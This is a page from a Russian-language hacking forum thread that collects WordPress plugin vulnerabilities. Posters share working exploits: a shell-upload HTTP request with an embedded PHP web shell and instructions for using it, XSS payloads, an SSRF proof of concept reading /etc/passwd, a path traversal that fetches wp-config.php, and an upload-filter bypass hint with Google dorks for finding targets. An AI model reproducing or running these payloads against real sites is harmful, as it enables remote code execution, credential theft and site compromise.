[ Обзор уязвимостей WordPress ]

Discussion in 'Веб-уязвимости' started by ettee, 5 Oct 2007.

  1. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    разве там нет anti-csrf хеша ?
     
  2. grimnir

    grimnir Members of Antichat

    Joined:
    23 Apr 2012
    Messages:
    1,114
    Likes Received:
    830
    Reputations:
    231
    https://wpvulndb.com/
    ежедневное обновление уязвимостей вп
     
    _________________________
    jslby, Bezlishke and SuNDowN like this.
  3. grimnir

    grimnir Members of Antichat

    Joined:
    23 Apr 2012
    Messages:
    1,114
    Likes Received:
    830
    Reputations:
    231
    https://github.com/dionach/CMSmap
    CMSmap сканер уязвимостей для популярных CMS WordPress, Joomla, Drupal.
    По сути,аналог WPScan , только можно использовать на Windows + поддержка веб-шелла.
     
    _________________________
    YaBtr, SlavaFroze and Cthulchu like this.
  4. grimnir

    grimnir Members of Antichat

    Joined:
    23 Apr 2012
    Messages:
    1,114
    Likes Received:
    830
    Reputations:
    231
    https://github.com/joren485/WP-Slimstat-SQLI
    скрипт для эксплутации бага WP-Slimstat
    http://blog.sucuri.net/2015/02/security-advisory-wp-slimstat-3-9-5-and-lower.html

    https://github.com/delvelabs/vane GPL форк известного сканера WPScan
     
    _________________________
    #304 grimnir, 5 Mar 2015
    Last edited: 11 Mar 2015
    Cthulchu likes this.
  5. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    MAC PHOTO GALLERY v. 2.7

    MAC PHOTO GALLERY
    dork: inurl:plugins/mac-dock-gallery/ download
    @version:2.7

    Уязвимый код:
    PHP:
    $file dirname(dirname(dirname(__FILE__)))."/uploads/mac-dock-gallery/".$_GET['albid'];
    header('Content-Description: File Transfer');
        
    header('Content-Type: application/octet-stream');
        
    header('Content-Disposition: attachment; filename='.basename($file));
        
    header('Content-Transfer-Encoding: binary');
        
    header('Expires: 0');
        
    header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
        
    header('Pragma: public');
        
    header('Content-Length: ' filesize($file));
        
    ob_clean();
        
    flush();
        
    readfile($file);
    POC:
    PATCH:
    https://wordpress.org/plugins/mac-dock-gallery/other_notes/
     
    _________________________
  6. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    WordPress 4.2 stored XSS

     
    _________________________
    VY_CMa likes this.
  7. ICQ Hool

    ICQ Hool Elder - Старейшина

    Joined:
    31 Mar 2008
    Messages:
    175
    Likes Received:
    25
    Reputations:
    0
    WordPress NextGEN Gallery 2.0.63 Shell Upload Vulnerability
    Code:
    WordPress NextGEN Gallery plugin version 2.0.63 suffers from a remote shell upload vulnerability.
    # Exploit Title: Wordpress NextGEN Gallery Plugin 2.0.63 Arbitrary File
    Upload
    # Author: SANTHO ( @s4n7h0 )
    # Vendor Homepage: http://wordpress.org/plugins/nextgen-gallery/
    # Category: WebApp / CMS / Wordpress
    # Version: 2.0.63 and less
    ---------------------------------------------------
    Vulnerability Tracking
    ======================
    Reported to vendor : Fri, May 9, 2014 at 9:20 PM
    Vendor Acknowledgement : Sat, May 10, 2014 at 2:36 AM
    Vendor Informed about patch release (version 2.65) : Mon, May 19, 2014 at
    7:54 PM
    Vulnerability Details
    =======================
    POST
    /index.php/photocrati_ajax?action=upload_image&gallery_id=0&gallery_name=
    HTTP/1.1
    Host: target_ip
    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:28.0) Gecko/20100101
    Firefox/28.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://[target_ip]/wp-admin/admin.php?page=ngg_addgallery
    Content-Length: 630
    Content-Type: multipart/form-data;
    boundary=---------------------------2427186578189
    Cookie:
    X-Frame-Events_290365e482ebdeeed313858b8a3de791=%7B%22event%22%3A%22new_gallery%22%2C%22gallery_id%22%3A1%2C%22gallery_title%22%3A%22folder_name%22%2C%22context%22%3A%22attach_to_post%22%7D;
    wordpress_test_cookie=WP+Cookie+check;
    wordpress_logged_in_57cce18206a53fed21932c6dc2920f94=admin%7C1399203127%7C70f668b775581773d1500b1b8162de42;
    wp-settings-time-1=1399030444
    Connection: keep-alive
    Pragma: no-cache
    Cache-Control: no-cache
    -----------------------------2427186578189
    Content-Disposition: form-data; name="name"
    cmd.php.jpg
    -----------------------------2427186578189
    Content-Disposition: form-data; name="file"; filename="cmd.php"
    Content-Type: image/jpeg
    <HTML><BODY>
    <FORM METHOD="GET" NAME="myform" ACTION="">
    <INPUT TYPE="text" NAME="cmd">
    <INPUT TYPE="submit" VALUE="Send">
    </FORM>
    <pre>
    <?
    if($_GET['cmd']) {
      system($_GET['cmd']);
      }
    ?>
    </pre>
    </BODY></HTML>
    The Shell can be accessible at following URL
    http://[target-ip]/wp-content/gallery/folder_name/cmd.php
            #  1337day.com  #
    Подскажите пожалуйста как этим чудом пользоваться?
     
  8. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    нужно отправить POST запрос, где при отправке подменить расширение с jpg на php
    шелл будет по адресу /wp-content/gallery/folder_name/shell.php
     
    _________________________
    SuNDowN and Mister_Bert0ni like this.
  9. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    367
    Likes Received:
    164
    Reputations:
    126
    Ну и xss там же

    Code:
    http://crytotheblind.com/site/wp-content/plugins/mac-dock-gallery/mac_imageview.php?mac_albid=1"><img src=x onerror=alert(1)//">&limit=42
     
    _________________________
  10. VY_CMa

    VY_CMa Green member

    Joined:
    6 Jan 2012
    Messages:
    917
    Likes Received:
    492
    Reputations:
    724
    Wordpress Twenty Fifteen Theme - DOM XSS Vulnerability - CVE-2015-3429
    Affected Versions: 4.2.1 and probably below

    Proof of Concept URL for DOM XSS in WordPress:

    Code:
    http://example.com/wp-content/themes/twentyfifteen/genericons/example.html#<img/src/onerror=alert(123)>
    Source: http://seclists.org/bugtraq/2015/May/56
     
    _________________________
  11. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Или вот такой вектор для Хрома

     
    _________________________
  12. SuNDowN

    SuNDowN Member

    Joined:
    31 Mar 2008
    Messages:
    25
    Likes Received:
    73
    Reputations:
    -8
    А разве для этого не нужны админ права?
     
  13. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    В паблике была опубликована такая бага:
    https://www.exploit-db.com/exploits/37166/ - WordPress dzs-zoomsounds Plugins <= 2.0 - Remote File Upload
    При анализирование баги и студии которая выпустила уязвимый компонент, были обнаружены также дополнительно уязвимые компоненты, темы и отдельные скрипты с этим уязвимым файлом.

    вот их продукция что попала мне с этим уязвимым файлом:

    сам уязвимый код:
    PHP:
    <?php

    /*
    * DZS Upload
    * version: 1.0
    * author: digitalzoomstudio
    * website: http://digitalzoomstudio.net
    *
    * Dual licensed under the MIT and GPL licenses:
    *   http://www.opensource.org/licenses/mit-license.php
    *   http://www.gnu.org/licenses/gpl.html
    */

    $disallowed_filetypes = array('.php''.exe''.htaccess''.asp''.py''.jsp''.pl'); // эта строчка взависимости от продукта, меняет набор расширений
    $upload_dir dirname(__FILE__) . '/upload';

    function 
    get_theheaders() {
        
    //$headers = array();
        //print_r($_SERVER);
        
    return $_SERVER;
    }

    //print_r($_POST); print_r($HTTP_POST_FILES); print_r($_FILES);

    if (isset($_FILES['file_field']['tmp_name'])) {
        
    $file_name $_FILES['file_field']['name'];
        
    $file_name str_replace(" ""_"$file_name); // strip spaces
        
    $path $upload_dir "/" $file_name;
        
    //print_r($HTTP_POST_FILES);
        //==== checking for disallowed file types
        
    $sw false;

        foreach (
    $disallowed_filetypes as $dft) {
            
    $pos strpos($file_name$dft);
            if (
    $pos !== false) {
                
    $sw true;
            }
        }

        if (
    $sw == true) {
            die(
    '<div class="error">invalid extension - disallowed_filetypes</div><script>hideFeedbacksCall()</script>');
        }
        if (!
    is_writable($upload_dir)) {
            die(
    '<div class="error">dir not writable - check permissions</div><script>hideFeedbacksCall()</script>');
        }




        if (
    copy($_FILES['file_field']['tmp_name'], $path)) {
            echo 
    '<div class="success">file uploaded</div><script>top.hideFeedbacksCall();</script>';
        } else {
            echo 
    '<div class="error">file could not be uploaded</div><script>window.hideFeedbacksCall()</script>';
        }
    } else {
        
    $headers get_theheaders();
        if (isset(
    $headers['HTTP_X_FILE_NAME'])) {
            
    //print_r($headers);
            
    $file_name $headers['HTTP_X_FILE_NAME'];
            
    $file_name str_replace(" ""_"$file_name); // strip spaces
            
    $target $upload_dir "/" $file_name;


            
    //==== checking for disallowed file types
            
    $sw false;

            foreach (
    $disallowed_filetypes as $dft) {
                
    $pos strpos($file_name$dft);
                if (
    $pos !== false) {
                    
    $sw true;
                }
            }

            if (
    $sw == true) {
                die(
    '<div class="error">invalid extension - disallowed_filetypes</div>');
            }

            if (!
    is_writable($upload_dir)) {
                die(
    '<div class="error">dir not writable - check permissions</div>');
            }


            
    //echo $target;
            
    $content file_get_contents("php://input");

            if (
    file_put_contents($target$content)) {
                echo 
    'success';
            } else {
                die(
    '<div class="error">error at file_put_contents</div>');
            }
        } else {
            die(
    'not for direct access');
        }
    }
    максимальная строчка с набором расширений на глаза попалась такая:
    $disallowed_filetypes = array('.php', '.exe', '.shtml', '.html', '.htm','.phtml','.php5', '.php4', '.pl', '.py', '.rb', '.htaccess', '.asp', '.jsp', '.aspx');

    но кто поймет этот участок кода:
    PHP:
    foreach ($disallowed_filetypes as $dft) {
                
    $pos strpos($file_name$dft);
                if (
    $pos !== false) {
                    
    $sw true;
                }
            }
    поймет что нам это не помеха ;-)

    Пассивные XSS:

    wp-content/plugins/dzs-videogallery/ajax.php?source="/><script>alert();</script>
    wp-content/plugins/dzs-videogallery/ajax.php?type="/><script>alert();</script>

    http://digitalzoomstudio.net/ - блог автора
    http://codecanyon.net/user/ZoomIt/portfolio - портфолио продаж компонентов

    P.S: Тэги для гугла)) dzs-videogallery exploit, dzs-zoomsounds exploit, dzs-calendar exploit, html5uploader exploit, php_ygallery exploit, php_mediagallery exploit, custom_rapista exploit, themes/royale/ exploit
     
    _________________________
    #314 winstrool, 4 Jun 2015
    Last edited: 5 Jun 2015
    SuNDowN, salre and grimnir like this.
  14. masolit

    masolit Member

    Joined:
    1 Dec 2010
    Messages:
    23
    Likes Received:
    20
    Reputations:
    0
    А как такое обходиться ?
     
  15. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    _________________________
    SuNDowN and salre like this.
  16. blackbox

    blackbox Elder - Старейшина

    Joined:
    31 Dec 2011
    Messages:
    362
    Likes Received:
    62
    Reputations:
    11
  17. avin

    avin Member

    Joined:
    4 Jul 2011
    Messages:
    103
    Likes Received:
    41
    Reputations:
    2
    да, пройдет
     
  18. Sleep

    Sleep Elder - Старейшина

    Joined:
    31 Oct 2007
    Messages:
    274
    Likes Received:
    65
    Reputations:
    4
    WP 3D Twitter Wall
    Code:
    # Vendor: https://wordpress.org/plugins/3d-twitter-wall/
    #/wp-content/plugins/3d-twitter-wall/proxy.php
    
    $url = ($_POST['url']) ? $_POST['url'] : $_GET['url'];
    ...
    $session = curl_init($url);    // $url = $_GET['url'] OR $_POST['url']
    ...
    $response = curl_exec($session);
    echo $response;
    curl_close($session);
    
    POC: _http://example.com/plugins/3d-twitter-wall/proxy.php?url=file:///etc/passwd
     
  19. grimnir

    grimnir Members of Antichat

    Joined:
    23 Apr 2012
    Messages:
    1,114
    Likes Received:
    830
    Reputations:
    231
    WordPress CP Image Store with Slideshow 1.0.5 [Arbitrary file download vulnerability]
    Code:
    # Exploit Title: WordPress CP Image Store with Slideshow 1.0.5  [Arbitrary file download vulnerability]
    # Date: 2015-07-10
    # Google Dork:
    # Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
    # Vendor Homepage: http://wordpress.dwbooster.com/
    # Software Link: https://downloads.wordpress.org/plugin/cp-image-store.1.0.5.zip
    # Version: 1.0.5
    # Tested on: windows 7 + firefox.
    
    ====================
    DESCRIPTION
    ====================
    
    A vulnerability has been detected in the WordPress CP Image Store with Slideshow plugin in version 1.0.5 .
    The vulnerability allows remote attackers to download arbitrary files from the server.
    The Arbitrary file download vulnerability is located in the `cp-image-store.php` file.
    
    The web vulnerability can be exploited by remote attackers without privileged application user account
    and without required user interaction. Successful exploitation of the Arbitrary file download vulnerability results
    in application compromise.
    
    ==============
    POC
    ==============
    
       # http://wp-host/wp-path/?action=cpis_init&cpis-action=f-download&purchase_id=1&[email protected]&f=../../../../wp-config.php HTTP/1.1
      
       the purchase_id parameter can be bruteforced and succesfully exploit this vulnerability.
    
      
    ==================
    VULNERABLE CODE
    ==================
    
    Located in cp-image-store.php
    
    function cpis_download_file(){
        ...
           
        if( isset( $_REQUEST[ 'f' ] ) && cpis_check_download_permissions() ){
            header( 'Content-Type: '.cpis_mime_content_type( basename( $_REQUEST[ 'f' ] ) ) );
            header( 'Content-Disposition: attachment; filename="'.$_REQUEST[ 'f' ].'"' );
            if( cpis_checkMemory( array( CPIS_DOWNLOAD.'/'.$_REQUEST[ 'f' ] ) ) ){
                readfile( CPIS_DOWNLOAD.'/'.$_REQUEST[ 'f' ] );
            }else{
                @unlink( CPIS_DOWNLOAD.'/.htaccess');
                header( 'location:'.CPIS_PLUGIN_URL.'/downloads/'.$_REQUEST[ 'f' ] );
            }
        ...
    }
    
     
    _________________________
    Sleep likes this.